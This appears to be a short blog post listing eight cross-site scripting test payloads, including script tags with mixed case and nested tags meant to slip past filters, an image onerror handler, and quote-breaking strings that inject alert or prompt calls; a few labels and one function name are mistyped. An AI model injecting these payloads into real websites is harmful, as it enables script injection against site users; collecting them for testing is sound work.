XSS Test

Let’s start…
Example 1:
<script> alert(‘1st example’)</script>
Example 2:
<ScripT>alert(‘ex2’)</ScripT>
Example 3:
<sc<script>ript>alert(‘ex3’)</sc</script>ript>
Example 4:
<h1><font color=blue>ex4</h1>
<img src=” ” onerror=alert(‘ex4’)/> 
Example 5:
“;promtp(‘ex6’);”
Example 6:
‘;alert(‘ex7′);’
Example 7:
“><script>alert(‘ex8’)</script>
Example 8:
# <script>alert(‘ex9’)</alert>

That’s it for now. Stay tuned for more posts in the future…

Comments

Popular Posts